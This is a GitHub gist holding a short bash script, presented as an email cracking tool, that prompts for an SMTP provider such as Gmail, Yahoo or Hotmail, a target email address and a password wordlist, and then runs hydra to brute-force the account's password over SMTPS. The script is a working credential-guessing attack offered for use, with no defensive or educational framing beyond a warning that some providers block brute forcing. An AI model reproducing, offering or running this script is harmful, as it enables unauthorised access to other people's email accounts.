Created
April 3, 2017 17:09
-
-
Save elijahcruz12/1a2d939795df8ed63b62c648aa4d0891 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#! /bin/bash | |
echo Simple Email Cracking Script in bash | |
echo Written By: Elijah Cruz github @elijahcruz12 | |
sleep 1s | |
echo NOTE: Make sure you have a .txt wordlist AND hydra installed! | |
echo hydra: https://github.com/vanhauser-thc/thc-hydra | |
sleep 1s | |
echo Some email providers have brute force protection, so beware! | |
sleep 1s | |
echo Let us Begin: | |
echo Choose a SMTP service: Gmail = smtp.gmail.com / Yahoo = smtp.mail.yahoo.com / Hotmail = smtp.live.com /: | |
read smtp | |
echo Enter Email Address: | |
read email | |
echo Provide Directory of Wordlist for Passwords: | |
read wordlist | |
hydra -S -l $email -P $wordlist -e ns -V -s 465 $smtp smtp |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment